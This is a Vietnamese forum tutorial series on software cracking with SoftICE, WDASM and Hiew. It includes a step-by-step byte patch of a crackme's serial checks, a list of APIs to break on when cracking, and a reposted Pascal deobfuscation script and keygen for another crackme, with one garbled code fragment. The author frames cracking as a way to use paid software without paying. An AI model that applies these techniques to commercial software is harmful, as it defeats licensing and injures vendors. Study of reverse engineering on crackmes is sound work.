BPX MessageBoxA
Rời SoftICE (Ctrl-D lần nữa hay nhập lệnh X hoặc bạn nhấn F5), vào Notepad, chọn File.New. Cửa sổ SoftICE sẽ bật lên, chúng ta đang ở điểm vào của API MessageBoxA. Mã mà bạn thấy trên Code Window không phải là mã của Notepad mà là mã của Kernel32.dll được ánh xạ qua vùng nhớ của Notepad, đừng quan tâm đến chuyện đó, nhớ rằng Breakpoint của chúng ta đã làm việc tốt.
Hãy tìm hiểu kĩ thêm 1 chút, xem mẫu hàm của API MessageBoxA:
int MessageBox(
HWND hWnd, // handle of owner window
LPCTSTR lpText, // address of text in message box
LPCTSTR lpCaption, // address of title of message box
UINT uType // style of message box
);
Nếu Notepad muốn gọi API này nó phải truyền đủ 4 tham số trên qua Stack (nhờ lệnh Push). Để ý kĩ các giá trị trên đỉnh Stack trong lúc này:

ESP (+ 0h) DWord chứa địa chỉ trở về mã Notepad, tức địa chỉ của câu lệnh kế tiếp lệnh gọi API MessageBoxA trong Notepad
ESP + 4h hWnd
ESP + 8h lpText
ESP + Ch lpCaption
ESP + 10h uType
Ghi chú: trong Win32 mỗi lần Push vào stack phải Push 1 DWord (4 Byte), khác với Dos mỗi lần Push chỉ là 1 giá trị 2 Byte.
Nếu bạn không hiểu những điều tui vừa nói ở trên thì cũng không sao, bạn cứ tạm chấp nhận. Nhưng nếu bạn muốn tìm hiểu kĩ hơn, hẹn gặp lại bạn ở 1 tài liệu khác dạy về lập trình Hợp Ngữ trên Windows, tui sẽ cố gắng viết nhanh để Upload lên cho các bạn.
Khi SoftICE dừng lại ngay trên điểm vào của API MessageBoxA, nhập:
D ESP+4
Theo bảng trên, lệnh này sẽ hiển thị trên Data Window giá trị của tham số hWnd tức Handle của cửa sổ Notepad.
Trên Data Window, bạn sẽ thấy 4 byte đầu tiên có dạng 'A0 04 00 00' (máy bạn có thể khác), vậy Handle của cửa sô Notepad là 4A0h.
Tiếp tục nhập lệnh:
D ESP + 8
sẽ thấy 4 byte '38 F8 63 00' (tức DWORD 63F838h)

Nhập:
D 63F838
Lệnh này sẽ Dump các Byte tại địa chỉ 63F838h và bạn sẽ thấy dòng text 'The text in the Untitled file has changed.\n\nDo you want to save the changes?'.
Để ý kĩ các Byte trong cột thứ 2 của Data Window, sẽ thấy chuỗi trên được kết thúc bằng Byte 00h (NULL) và '\n' có giá trị là 0Ah.
Bạn cũng có thể tìm đến chuỗi trên nhanh hơn bằng cách dùng lệnh sau:
D @(ESP + 8)
hay
D ESP->8
Ở đây chúng ta phải định vị gián tiếp vì giá trị lpText truyền cho API MessageBoxA là con trỏ trỏ đến chuỗi thông báo trên.
Để nhanh hơn, đặt 1 Breakpoint như sau:
BPX MessageBoxA DO "D @(ESP+8)"
Bạn có thể cho SoftICE thi hành từng lệnh một bằng cách dùng lệnh P (hay nhấn F10) hoặc lệnh T (hay nhấn F8).
Sự khác nhau giữa 2 lệnh này là ở chổ lệnh P xem 1 lời gọi hàm Call xxxx như 1 lệnh đơn lẻ và cho thi hành toàn bộ thủ tục xxxx được gọi bởi lệnh Call này, sau đó dừng lại ở lệnh kế tiếp ngay sau lệnh Call xxxx, còn lệnh T sẽ nhảy đến dòng lệnh đầu tiên của thủ tục xxxx và dừng lại.
Lệnh T tất nhiên sâu sắc hơn lệnh P nhưng lúc nào cũng dùng nó thay thế cho lệnh P thì không phải là 1 ý hay, bạn rất dễ bị lệnh này dẫn đến 1 thủ tục không đâu và "quên cả đường về". Điều quan trọng là phải biết lúc nào cần dùng T và lúc nào cần dùng P. Thời gian sẽ dạy cho bạn điều đó.
Trong Code Window, bạn cũng có thể dùng chuột kích vào 1 dòng mã bên dưới dòng mã hiện đang thực thi để dời con trỏ đến đây, sau đó nhấn F7 (lệnh HERE), khi mã thi hành đến vị trí con trỏ (nếu thực sự mã có thể thi hành đến đúng vị trí con trỏ), SoftICE sẽ dừng lại cho bạn. Đây chính là cách đặt Breakpoint dạng one-shot.
Nếu bạn đã chán và muốn trở về lệnh ngay sau lệnh gọi API MessageBoxA, nhập lệnh:
G @SS:ESP
hay cũng có thể nhấn F11.
Lệnh trên sẽ kiểm tra khi thanh ghi con trỏ lệnh EIP vươn tới được địa chỉ được chỉ rõ trong SS:ESP, sẽ cho "đóng băng" Notepad ngay lập tức. Như tui đã nói ở trên, DWord tại SS:ESP hiện tại đang chứa địa chỉ trở về của mã Notepad, tức địa chỉ của câu lệnh kế tiếp lệnh gọi API MessageBoxA trong Notepad.
Nhấn Cancel, chúng ta sẽ quay lại SoftICE, nhìn lên 1 chút, bạn sẽ thấy đoạn mã như sau:
:004023FC 51 push ecx
:004023FD 8D857CFEFFFF lea eax, dword ptr [ebp-0184]
:00402403 FF750C push [ebp+0C]
:00402406 50 push eax
:00402407 FF7508 push [ebp+08]
:0040240A FF15A8644000 Call [USER32!MessageBoxA]
:00402410 8BE5 mov esp, ebp
Dễ dàng thấy được 4 câu lệnh Push truyền các tham số cho API MessageBoxA.
Nhập lệnh:
BPX 40240A
hay kích đôi vào câu lệnh 'Call [USER32!MessageBoxA]'.
Chúng ta đang tạo 1 Breakpoint dạng point-and-shoot cho câu lệnh này.
Vào lại Notepad chọn File.New. Cửa sổ SoftICE bật lên và chúng ta dừng ngay trên câu lệnh 'Call [USER32!MessageBoxA]'. Breakpoint của ta đã làm việc!.
Để xoá hết các Breakpoint đã đặt dùng lệnh
BC *
Một số thao tác trên các Breakpoint

Vô hiệu hóa Breakpoint
Dùng lệnh:

BD list | *

Trong đó:
• list : 1 dãy các số hiệu Breakpoint ngăn cách nhau bởi dấu phẩy hoặc khoảng trắng.
• * : vô hiệu hóa tất cả các Breakpoint.
Thí dụ lệnh:
BD 1,3
sẽ vô hiệu hóa Breakpoint có số hiệu 1 và 3.
Kích hoạt lại Breakpoint
Dùng lệnh:

BE list | *

Lệnh BE sẽ kích hoạt lại 1 hoặc 1 dãy các Breakpoint đã được vô hiệu hóa trước đó.
Thí dụ lệnh:
BE 3
sẽ kích hoạt lại Breakpoint 3.
Danh sách các Breakpoint đã đặt
Để hiển thị danh sách các Breakpoint đã đặt dùng lệnh BL.
Xóa Breakpoint
Dùng lệnh:

BC list | *

Thí dụ lệnh:
BC 1
sẽ xóa Breakpoint có số hiệu 1, tương tự lệnh:
BC *
sẽ xóa tất cả các Breakpoint.
Memory Breakpoints

1 Memory Breakpoint dùng các thanh ghi debug trên các CPU từ 386 trở lên để theo dõi sự truy cập vào 1 vị trí bộ nhớ xác định. Dạng Breakpoint này rất hữu dụng để phát hiện khi nào và ở đâu 1 biến trong chương trình bị thay đổi và còn dùng để đặt các Execution Breakpoint trong vùng nhớ chỉ đọc. Bạn chỉ có thể đặt tối đa 4 Memory Breakpoint trong 1 lần bởi vì CPU chỉ có 4 thanh ghi debug.
Bạn có thể dùng lệnh BPM để đặt Memory Breakpoint:

BPM[B|W|D] address [R|W|RW|X] [ debug register] [IF expression]
[DO "command1;command2;"]

Trong đó:
• BPM và BPMB : đặt Breakpoint tại 1 Byte bộ nhớ xác định.
• BPMW : đặt Breakpoint tại 1 Word (2 Byte) bộ nhớ xác định.
• BPMD : đặt Breakpoint tại 1 DWord (4 Byte) bộ nhớ xác định.
• R, W và RW : sẽ ngắt khi xảy ra thao tác đọc, viết hoặc cả 2
Nếu bạn không chỉ rõ, mặc định sẽ là RW.
• X : ngắt nếu thi hành, mạnh hơn dạng Breakpoint BPX vì bộ nhớ không cần phải sửa đổi.
• Debug register : chỉ rõ thanh ghi debug sẽ dùng.
Một lệnh đặt Memory Breakpoint khác hay dùng hơn là lệnh BPR, dùng để đặt Breakpoint cho 1 đoạn bộ nhớ. Cú pháp:

BPR start_address end_address [R | W | RW | T | TW] [IF expression]
[DO"command1;command2;"]

Bất kì khi nào xảy ra thao tác đọc, viết hay cả hai (tùy theo bạn đặt, nếu bạn không chỉ rõ, mặc định sẽ là viết) trong khoảng bộ nhớ từ start_address đến end_start sẽ làm phát sinh 1 Breakpoint.
Window Message Breakpoints

Dùng Window Message Breakpoint để chặn 1 hoặc 1 dãy các thông điệp đi đến 1 thủ tục giải quyết thông điệp Window (WinProc). Mặc dù cũng có thể làm được điều này nếu dùng BPX với 1 biểu thức điều kiện nhưng dùng lệnh BMSG thì vẫn dễ hơn:

BMSG window-handle [L] [ begin-message [ end-message]] [IF expression]
[DO "command1;command2;"]

Trong đó:
• window-handle : giá trị định danh cửa sổ, được trả về khi cửa sổ được tạo thành. Bạn có thể dùng lệnh HWND để lấy danh sách các cửa sổ kèm theo Handle của nó.
• L : cho biết thông tin về thông điệp Window bắt được chỉ cần in ra trong Command Window mà không cần phải bật cửa sổ SoftICE lên.
• begin-message : thông điệp Window đơn lẻ hay là thông điệp có số hiệu thấp nhất trong dãy các thông điệp Window muốn theo dõi. Nếu bạn không chỉ rõ dãy thông điệp với 1 end-message, thì chỉ begin-message sẽ gây ra ngắt. Cả 2 begin-message và end-mesage có thể được ghi dưới dạng tên hoặc số hiệu của nó thí dụ WM_QUIT và 12h là tương đương.
• end-message : thông điệp có số hiệu cao nhất trong dãy các thông điệp Window cần theo dõi.
Nếu không có thông điệp hoặc dãy các thông điệp nào được chỉ rõ, bất cứ thông điệp nào cũng sẽ gây ra ngắt.
Bạn có thể dùng lệnh WMSG để lấy danh sách các thông điệp Window mà SoftICE biết.
Nếu bạn biết tên thông điệp nhưng không biết số hiệu của nó, có thể tìm được số hiệu của nó bằng cách dùng lệnh sau:

? tên_thông_điệp
Thí dụ để biết số hiệu của thông điệp WM_TIMER, nhập lệnh:
? WM_TIMER
Thử thực hành thí dụ sau:
Mở Notepad. Sau đó nhập lệnh:
HWND

SoftICE sẽ hiển thị danh sách các cửa sổ kèm theo các thông tin khác (thí dụ tên lớp cửa sổ, địa chỉ Window Procedure...). Bạn có thể thấy giá trị Handle của các cửa sổ nằm ở cột đầu tiên. Chúng ta chỉ quan tâm giá trị Handle của cửa sổ Notepad. Ở máy tui giá trị này là 190h (máy bạn có thể khác). Nhớ lấy giá trị này.

Để chỉ hiển thị các thông tin cửa sổ của riêng Notepad, bạn có thể dùng lệnh:
HWND Notepad
Chúng ta đặt 1 Breakpoint để theo dõi tất cả các thông điệp đi đến cửa sổ chính của Notepad:
BMSG 190 L
Tham số L sẽ khiến cho SoftICE chỉ in thông tin về thông điệp bắt được trong Code Window mà không cần bật cửa sổ SoftICE lên.

Rời SoftICE (Ctrl-D), trong Notepad, bạn thao tác gì đó (thí dụ gõ 1, 2 từ, thay đổi kích thước cửa sổ...), sau đó quay lại SoftICE, trong Code Window sẽ hiển thị tất cả thông tin về các thông điệp do Windows gởi đến cửa sổ Notepad mà SoftICE bắt được.
Để bắt 1 thông điệp riêng biệt, thí dụ WM_SIZE bạn dùng lệnh sau:
BMSG 190 WM_SIZE
Trở lại Notepad, bạn thử thay đổi kích thước cửa sổ của nó (thí dụ phóng to hay thu nhỏ cửa sổ Notepad), khi đó Windows sẽ gởi đến cho Notepad 1 thông điệp WM_SIZE, SoftICE sẽ bật lên và bạn sẽ thấy nó dừng ngay trên điểm vào của thủ tục Window giải quyết thông điệp cho cửa sổ chính Notepad.

V.Một số hàm API thường được đặt Breakpoint khi Crack
Phần lớn là các API trong các thư viện: gdi32.dl, kernel32.dll, user32.dll...
Liên quan đến File

CreateFileA
ReadFile
WriteFile
GetPrivateProfileStringA
WritePrivateProfileStringA
Liên quan đến Registry

RegCreateKeyA
RegDeleteKeyA
RegOpenKeyA
RegCloseKey
RegQueryValueA
Liên quan đến hộp thoại và cửa sổ

CreateDialogIndirectParamA
CreateDialogParamA
MessageBox
MessageBoxA
MessageBeep
CreateWindow
CreateWindowExA
ShowWindow
Liên quan đến chuỗi

GetWindowText
GetWindowTextA
GetDlgItemText
GetDlgItemTextA
CompareString
lstrcmp
lstrcmpA
lstrcmpi
lstrcmpiA
Liên quan đến ngày giờ

GetSystemTime
GetLocalTime
SystemTimeToFileTime
Liên quan đến kiểm tra đĩa

GetDriveType
GetDriveTypeA
GetLogicalDrives
GetLogicalDriveStringsA
Các hàm đặc biệt khác

HMEMCPY
Thường hay dùng nhất là HMEMCPY, GetDlgItemTextA, GetWindowTextA, MessageBoxA

- Các "function" mà bạn có thể "túm" được ở SoftIce khi Crack các Softwear, trong softIce bạn gõ như sau EXP ( EXP = Display Export Symbols). Ví dụ : EXP Message
1. USER : MESSAGEBOXINDIRECT, MESSAGEBOX, MESSAGEBOXEX, MESSAGEBEEP ...
2. USER32 : MESSAGEBEEP, MESSAGEBOXA(rất hay dùng), MESSAGEBOXEXA, MESSAGEBOXEXW, MESSAGEBOXINDIRECTA, MESSAGEBOXINDIRECTW, MESSAGEBOXW ...
3. Ðọc và ghi File : READFILE, WRITEFILE, CREATFILEA, SETFILEPOITER ...
4. Kiểm tra Registry : REGCREATKEYA, REGDELETEKEYA, REGQUERYVALUEA, REGCLOSEKEYA, REGOPENKEYA ...
5. Nhập thông số (hay dùng để tìm Serial hay Key..): GETWINDOWTEXTA, GETDLGITEMTEXTA, GETDLGITEMINT...
6. Kiểm tra thời gian : GETLOCALTIME, GETSYSTEMTIME, GETFILETIME...
7. Kiểm tra ổ đĩa CD-ROM hay A (hay dùng để Crack CD-Game) : GETDRIVETYPEA(rất hay dùng), GETLOGICALDRIVESA, GETLOGICALDRIVESTRINGA...
Và cuối cùng là cái mạnh nhất (dùng cho tất cả các Break point trên) : HMEMCPY(hay dùng để tìm serial với các Softwear viết bằng VB.
Sau khi biết được Soft dùng breakoint nào bạn hãy "gọi" nó ra bằng lệnh : BPX (BPX= Breakpoint on eXecution), Ví dụ: BPX HMEMCPY.
- Các lệnh để xem số Serial : D, DB, DW, DD, DS, DL, DT.... Quan trọng nhất là DD

Bai viet cua hacnho from HVA-www.hackervn.org/forum (xin vui long de dong nay khi ban trich dan lai--thanx a lot)

-------Hết Phần III---Trong phần III tôi sẽ hướng dẫn các bạn làm sao để crack một chương trình bằng WDASM893 và Hacker Views602, và hướng dẫn crack file crack me của CU TI
*************************************:
PHẦN III :

Xin chào, chúng ta lạI gặp nhau…Trong bài viết này tôi sẽ hướng dẫn sử dụng WDASM893 và Hacker Views602. Hai công cụ không thể thiếu của một cracker

I.GiớI thiệu WDASm

Nếu như ví SoftIce là khẩu M-16 thì WDASM là một khẩu Beretta đạn bạc. Vì WDASM sẽ giúp bạn rất nhiều trong việc crack phần mềm mà bạn không cần dùng SoftIce…Bây giờ tôi sẽ hướng dẫn các bạn cách sử dụng cơ bản nhất, muốn hiểu rõ hơn bạn hãy mở phần help của nó nhé

1.Disassembly vớI WDASM:

a.Disassembly File

Muốn disassembly file nào(nhớ chọn dạng file thích hợp thường là *.exe, *.dll), từ menu Disassembly ta chọn Open file to disassembly…chọn file cần disassembly…
*-Lưu ý trong submenu Disassmbly Options bạn nên đánh dấu chọn cả ba dòng
-Enable Conditional Jump X Preferences
-Enable Uncondional Jump X Preferences
-Enable Call X Preferences
*-Nếu bản WDASM của bạn đã patch (cho phép DASM VB), trong sub menu Patch Options, bạn đánh dấu chọn auto hoặc on trong dòng Enable và đánh dấu cả hai checkbox Line Prefix, Values trong dòng Copy Selected Lines

b.Quick Edit
Nếu bản của bạn đã fixed thì bạn sẽ có một menu Edit trên thanh công cụ, submenu Quick Edit giúp bạn có thể chỉnh sửa file trực tiếp trên nền của WDASM mà không cần dùng tớI HIEWS-Quá tiện lợI phảI không? Muốn chỉnh sửa file tạI location nào ta chỉ cần double click tạI dòng đó, xong chọn QuickEdit—Trong của sổ của Quick Edit có các khung sau:

-RVA Word : nhập vào location cần tớI, xong nhấn Goto
-Original Bytes: Bytes trước khi chỉnh sửa
-Modify Bytes: Bytes sau khi chỉnh sửa
-Save: lưu lạI Bytes sau khi chỉnh sửa
-Run: Chạy file đang chỉnh sửa
-Delete: xoá

c.Goto location:

trong ô Code Offset (hex) nhập vào location rồI enter để đến location vừa nhập. Ví dụ 00401000. Chức năng này thường dùng khi bạn dùng SoftIce kiếm được tử huyệt của soft đang crack …

d.String Data References:

là nơi rất quan trọng để crack phần mềm , vì nơi đây là nơi hiện ra các thông báo thông thường của các soft(nhưng đôi khi tác giả phần mềm cố ý mã hoá nó đi…Nhưng không sao cả ta có cây M-16 SoftIce). Một mẹo nhỏ cho các bạn. nếu muốn patch phần mềm thì nên tìm những thông báo tương tự như "Incorrect Password...", "Wrong Serial...", "Re-enter password..." , xong rồI các bạn di chuyển vệt sáng lên phía trên nhé, dịch chuyển xuống dướI là ngu luôn đấy ke ke ke ở tù đấy---nhất là dưới 16 tuổi

-------bấy nhiêu đó thôi,mỏi tay quá, nếu muốn biết chi tiết các bạn nên xem phần help của WDASM nhé---------

II.GiớI thiệu Hacker Views 602

HIEWS là một chương trình Hexa Editor rất mạnh, hoạt động tương tự như Norton Commader5.0 for DOS của Symantec, các phím tắt cũng như NC5. Nó được ví như đạn dược vì dùng SoftIce,WDASM chỉ tìm offset còn nhiệm vụ cuối cùng vẫn là dùng Hviews để kill soft.Trời ạ súng mà không có đạn thì chết chắc rồi còn gì. Tuy M-16 (SoftICe) có một vũ khí đó là lưỡi lê (hàm aeip-chỉnh sửa trực tiếp trên soft Ice), nhưng chỉ dùng cho một số trường hợp đặc biệt thôi...

- Muốn chuyển ổ đĩa hiện hành nhấn Alt + F1,
- F4 để chọn chế độ trong bảng Select Mode: Text, Decode,Hex…bạn có thể nhấn Enter cũng được
- F7 dùng để search
- F5, gõ vào địa chỉ Offset và enter
- F3 dùng để chỉnh sửa,
- F2 dùng để chỉnh sửa vớI một ô lớn hơn, tương tự như menu Quick Edit của WDASM
- F9 để lưu,
- F10 để thoát, hoặc đơn giản là bạn nhấn ESC
----HIEWS rất dễ dùng bạn hãy tự khám phá thêm nhé---------------

***Một số lưu ý nhỏ***

Khi bạn tìm được tạI một location một offset thì bạn hãy nhìn xuống dưới thanh taskbar những chữ số hexa sau chữ @ (trừ chữ h đi nhé) đó chính là địa chỉ offset trong HIEWS đó
Ví dụ tạI địa chỉ 004013AF tôi sẽ có một offset là @00007Afhà thì 00007AF chính là địa chỉ offset trong HIEWS
-------------------------------------------------------------------------

để các bạn có thể hiểu sơ lược về các dùng của ba phần mềm SOFTICE,WDASM,HIEWS tôi xin hướng dẫn các bạn crack một crack me của anh nicehacker…ở đây tôi chỉ bày cho các bạn phương pháp patch nó thôi…Còn phương pháp tìm được serial thì bạn tự tìm hiểu nhé

-------------------------------------------------------------------------------------------

Chào các bạn...chắc hẳn không ít các bạn đã buông tay chịu trói trước file crk me HVA_UNPACKED.exe...he he...Nếu các bạn chưa tìm được số serial thì tôi xin bày cho các bạn phương pháp để patch file crk me này, chứ riêng tôi thì mỗi lần tôi gõ đại vào ô serial một con số bất kỳ thì nó hiện lên " wrong serial .." phát bực mình he he...Mục đích tôi là làm sao cho nó hiện lên thông báo "Good job,and now make a keygen "...Tôi không nêu phương pháp tìm serial tuy nhiên dựa vào bài víêt này các bạn sẽ tìm được số serial... he he mong các đàn anh tha tội vì em đã patch nó ke ke ke

Công cụ: SoftIce Driver Suite 2.6, Wdasm893 fixed, Hiew602
Patcher : hacnho

Lưu ý: do CuTi rất ma lanh là đã mã hoá nên các dòng thông báo như "Wrong serial" không hiện lên trong String Data References của WDASM nên không thể dùng WDASM trực tiếp được nên tôi phải dùng SofIce để tìm các hàm call gọi ra cái nag đó...

Đầu tiên các bác chạy file hva_unpacked.exe, nhập vào một số serial bất kỳ, tôi nhập vào số serial là 123456, khoan nhấn Ok, gõ Ctrl+D để vào SoftIce (nếu dùng SoftIce Driver Suite 2.6 phải start softice trên thanh start trước), gõ vào bpx GetDlgItemTextA, enter, nhấn Ctrl+D, để ra khỏi SoftIce sau khi đã đặt một break point, nhấn nút Ok trên fiel crk me HVA_UNPACKED.exe. Ta lại vào SoftIce, các bác nhấn F10 cho đến khi thấy thông báo " wrong serial.." nhẩy lên che khuất màn hình SoftIce, Lúc này các bác phải tinh mắt nhìn thấy khi ta nhấn F10 vệt sáng di chuyển đến dòng có chữ
Call User32! MessageBoxA
004011AB Popad > he he đây chính là thông báo đáng ghét đó,

các bác nhớ lấy nó, sau đó gõ bc *( xoá Break Point), F5 để thoát...
mở WDASM, mở crk me đó lên, vào goto location 004011AB...Các bác sẽ nhìn thấy như vầy

* Referenced by a (U)nconditionnal or ©conditional Jump at Adresses:
|:004010C6©, : 004011110©, :00401119©...

:00401197 61 popad >>Gọi thông báo đúng khi các bác nhập vào serial đúng
:00401198 6A00 push 00000000
:0040119A 68CE304000 push 004030CE

.....
* Referenced To : user32.MessageBoxA, Ord:0000h
:004011A6 E845000000 call 004011F0
:0004011AB 61 popad >>he he Gọi thông báo wrong serial đó...

các bác đọc tới đây chắc cũng hiểu một phần phải không? Nên biết crk me này chỉ có hai thống báo khi nhập serial, một là thông báo "good job..", hai là thông báo "wrong serial..." Do đó ta có hai cách patch là hoặc tất cả những câu lệnh nhảy trong phần so sánh số serial ta đều đổi ngược lại hoặc là ta đổi từ popad 0004011AB sang 00401197 trong các câu lệnh nhảy...
để cho newbie dễ hiểu tôi chọn cách một đó là đổi câu lệnh nhảy trong phần so sánh serial đều ngược lại hết...

Nhắc lại phần trên, khi các bác goto location 0004011AB rồi, vệt sáng sẽ nằm tại dòng
:0004011AB 61 popad...
hãy di chuyển chuột lên trên chừng 20 dòng các bác sẽ thấy

*Reference To: user32.GetDlgItemTextA, Ord: 0000h

:00401109 E8D6000000 Call 004011E4
:0040110E 85C0 Test eax,eax >> kiểm tra serial
:00401110 0F8481000000 je 00401197 >>nếu đúng, nhảy tới thông báo "good job"

yeah, vần đề nằm ở đây...hãy ghi nhớ tất cả những địa chỉ offset có chữ jne...Cụ thể là 5 địa chỉ

1.00000519
2.00000535
3.0000054C
4.00000563
5.0000057C

đóng WDASm lại, dùng Hiew mở HVA_UNPACKED.exe lên,

gõ F5, gõ 00000519, nhấn F3, đổi 75 thành 74
gõ F5, gõ 00000535, nhấn F3, đổi 75 thành 74
gõ F5, gõ 0000054C, nhấn F3, đổi 75 thành 74
gõ F5, gõ 00000563, nhấn F3, đổi 75 thành 74
gõ F5, gõ 0000057C, nhấn F3, đổi 75 thành 74

nhấn F9 để lưu, F10 để thoát...
Mở lại file HVA_UNPACKED xem, gõ vào số serial gì nó cũng hiện lên thông báo "Good job,and now make a keygen xxxxxx"...he he he

Chú ý : xxxxxx: số serial tầm bậy mà các bác nhập vào

Bài viết này tôi viết dùng để giúp các bạn học tập...Nếu bạn chưa rành về số serial, thì hãy tập patch...hiện nay có nhiều phần mềm chỉ patch được, chứ ít crk được...Có thể thí dụ là Winrar3x...Ngô Vĩnh Hoàng là một crker khá quen thuộc với dân xài đồ chùa Việt Nam, cũng thường pacth chứ đâu có crk hoàn toàn đâu...Crk hay patch cũng được (theo tôi) miễn sao là mình đạt tới mục đích là xài được một phần mềm nào đó miễn phí mà không phải trả tiền...

Nhân đây tôi cũng post lên một bài của bác luucorp tut crack Crackme#1 của Softcracker_vn bên vncracking để các bạn tham khảo, ai cần source crackme thì PM me

----------------------------------------------------------
Huong dan viet KEYGEN OF: crackme#1.exe

Tools()
---------
1. Hview ©SEN --> HVI
2. W32DASM V8.93 --> W32
3. crackme#1.exe --> C#1

HeLp()
--------
1)deprotect:

Dau tien ban cu thu load C#1 trong W32 xem no ra sao, nhu thuong le bam vao menu Refs/.., ca 3 muc ( Menu.., Dialog.., String.. ) deu trang ca. (khong van de gi), thoat khoi menu va ta tiep tuc an F10:

Ta toi doan code sau:

:00401000 PUSH 0 ;
* Reference To:KERNEL32.GetModuleHandleA, Ord:0000h
|
:00401002 CALL 4068A3
:00401007 MOV DWORD PTR [4070FB],EAX
:0040100C XOR EAX,EAX
:0040100E MOV AX,67
:00401012 PUSH 0
:00401014 PUSH 0040102C ;
:00401019 PUSH 0
:0040101B PUSH EAX
:0040101C PUSH DWORD PTR [4070FB]

* Reference To: USER32.DialogBoxParamA, Ord:0000h
|
:00401022 CALL 40686d

* Reference To: KERNEL32.ExitProcess, Ord:0000h
|
:00401027 CALL 4068a9

Doan ma tren la bo khung cua chuong trinh, phan rau ria nam o phia sau, tiep tuc keo xuong phia duoi va dung lai khi den doan ma sau:

:004011D6 enter 0000,00
.
.
:004011DF cmp bye ptr [4070FA],0 ---|
:004011E6 jmp 004011E9 <---- khong on

Ban doc doan ma nay, thay co dieu gi do khong on thi phai lam gi co chuyen vua cmp xong da jmp (la qua di mat), thuong sau cmp se la jnz, jz , jne, je, jnb,... hoac la jxx khac. Do vay ta thu tim xem co cai jxx nao ma xx<>mp (jxx <> jmp) o doan ma duoi khong, tot nhat ta nen vao HVI.

Trong HVI nhay toi .004011E6. Keo xuong 1 it ban thay tai:
.00401232: jne .00401C80 <-- co jne<>jmp roi, nhu the thi doan ma giua cmp va jne no lam cai quai gi?
ban tiep tuc keo xuong phia duoi ban thay co nhieu doan co ma tuong tu
nhu doan ma tren (ma giua cmp,jne).
va...
Theo thong ke cua toi thi, C#1 chi co 3 mau code duoc lap lai 1 cach kha don gian:

mau1[19]=(235,1,131,156,235,1,213,235,8,53,157,235,1,137,235,3,11,235,247);
mau2[24]=(96,232,3,0,0,0,131,235,14,235,1,12,88,235,1,53,64,235,1,54,255,224,11,97);
mau3[24]=(235,1,227,96,232,3,0,0,0,210,235,11,88,235,1,72,64,235,1,53,255,224,231,97);

Chuong trinh C#1 duoc viet theo kieu:

lenh1: vao ten
mau1[19]
lenh2: kiem tra ten
mau2[24]
lenh3: vao serial
mau1[19]
mau3[24]
.
.

co nghia la mau1[19],mau2[24],mau3[24] co hoac khong chang anh huong gi. ki thuat co ten "muta code", duoc su dung trong 1 so virus (tu nhung nam <=95). vi vay, de cho ma duoc sang sua chung ta hay don sach 3 mau tren bang canh: tim 3 mau tren va dien (nop=90h=khong lam gi). toi da viet 1 chuong trinh de thu hien viec tren (uprotect.PAS). {deprotect.pas} type m24=Array[1..24] of Byte; const p19: Array[1..19] of Byte =(235,1,131,156,235,1,213,235,8,53,157,235,1,137,235,3,11,235,247); p24: m24 =(96,232,3,0,0,0,131,235,14,235,1,12,88,235,1,53,64,235,1,54,255,224,11,97); c24: m24 =(235,1,227,96,232,3,0,0,0,210,235,11,88,235,1,72,64,235,1,53,255,224,231,97); var f:file; buf:m24; i,j,m,n:integer; se:longint; begin write('Please wait.'); assign(f,'CrackMe1.EXE'); reset(f,1); se:=$7e6; {} repeat seek(f,se); fillchar(buf[1],24,0); blockread(f,buf[1],24,j); for m:=1 to 19 do {p19} if buf[m]<>p19[m] then begin m:=1;break;end;

for i:=1 to 24 do {p24}
if buf[i]<>p24[i] then begin i:=1;break;end;

for n:=1 to 24 do {c24}
if buf[n]<>c24[n] then begin n:=1;break;end;

buf[1]:=$90; {fill nop}
seek(f,se);
if m<>1 then
begin
for m:=1 to 19 do
blockwrite(f,buf[1],1);
inc(se,m)
end else
if i<>1 then
begin
for i:=1 to 24 do
blockwrite(f,buf[1],1);
inc(se,i);
end else
if n<>1 then
begin
write('.');
for n:=1 to 24 do
blockwrite(f,buf[1],1);
inc(se,n);
end else
inc(se);
until j<24; nop="0x90"> .00401C80
(hoac dat 1 lech jmp 1280 tai .004011DF)
viec 2:
thuc hien kha thu cong hoac ban tu viet 1 ct lam dieu nay.
[40702e+i] = [40702e+i]^0x43 (i=0..203=0xCC-1)

Xong 2 viec tren la lai load C#1 trong W32, lai vao Refs/.., ai cha cai gi day co 1 muc da bat sang: ta click vao (String Data References) va cong viec con lai la cua ban. toi da doc va viet duoc keygen sau.

{keygen.pas}
var
ten: string;
i,w: byte;
crc,se: longint;
begin
asm mov ax,3;int $10;end;
writeln('----'#13#10'Crackme#1 for softcracker_vn - Keygen by dactrung'#13#10'----');
write('Name: ');readln(ten);
write('Code: ');
crc:= 0;
for i:= 1 to length(ten) do
begin
w:= ord(ten[i]);
if not(ten[i] in ['A'..'z']) then
w:= (w mod 10)+ ord('A')+ (w div 10);
if w<$61 then w:=w+ $20; w:= w-$61; crc:= (crc shl 1)+ w; end; crc:=crc xor $17021995; se :=crc xor $43545CD1; {magic number} se :=se xor $26051976; write(se); readln; end. thanks, dactrung luucorp@yahoo.com

-----------------------------------------------------
Bai viet cua hacnho from HVA (xin vui long de dong nay khi ban trich dan lai--thanx a lot)

------Het Phan III ----

Trong phần 4 tôi sẽ đưa ra cho các bác một tut về các kỹ năng cơ bản để trở thành một cracker, cũng xin thông báo với các bác là từ phần 4 trở đi kèm theo mỗi bài hướng dẫn tôi sẽ kèm theo hai bài hướng dẫn crack một soft, một game hay crackme...trong đó một bài do tôi crack và một bài nữa tôi sưu tầm do các đại ca crack...
***************************************:
Phần IV: Làm sao để crack được một soft…

Chào các bạn, chúng ta lạI gặp lạI nhau… Trong phần IV này chúng ta sẽ bàn đề vấn đề chính đó là làm sao để crack được một phần mềm bằng WDASM và Hacker Views ??? (không dùng SoftIce).
He he he câu hỏI thật dễ nhưng mà trả lờI không dễ chút nào…!!! Tôi cũng như các bạn khi tập tễnh bước vào làng crack cũng phảI toát mồ hôi mớI crack được một phần mềm. Sau đây là một số kinh nghiệm bản thân tôi khi muốn crack một phần mềm bằng WDASM và Hacker Views .

Chú ý: Trong bài này tôi có tham khảo bài viết của anh HOAVELU—Thanx for support

I. Tổng Quát:

Trên thị trường phần mềm hiện nay có rất nhiều phần mềm, chủng loạI thật đa dạng và phong phú…MỗI ngày lạI có nhiều phần mềm mớI ra đờI, bản thân những phần mềm đã xuất hiện cũng luôn luôn nâng cấp lên version mới…Do đó cách crack luôn luôn phảI linh động , không được lấy y chang cái cũ mà áp dụng cho cái mới…Sẽ thất bạI ngay!!!

